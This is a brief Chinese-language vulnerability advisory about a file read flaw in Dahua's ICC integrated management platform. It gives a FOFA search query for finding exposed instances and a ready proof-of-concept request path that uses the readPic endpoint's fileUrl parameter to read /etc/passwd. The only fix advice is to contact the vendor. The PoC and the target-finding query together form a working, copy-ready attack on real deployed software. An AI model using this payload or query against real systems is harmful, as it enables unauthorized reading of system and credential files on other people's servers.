Nx01 产品简介
大华智能物联ICC综合管理平台是一个集成了多种智能物联应用服务能力的平台。该平台提供了一系列的基础能力,如中台基础能力、各智能物联应用服务能力以及周边生态支持。
Nx02 漏洞描述
大华智能物联ICC综合管理平台存在文件读取漏洞,攻击者利用该漏洞可以获取相关敏感信息。
Nx03 产品主页
fofa-query: body="客户端会小于800"
Nx04 漏洞复现
POC:
/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd
Nx05 修复建议
建议联系软件厂商进行处理。
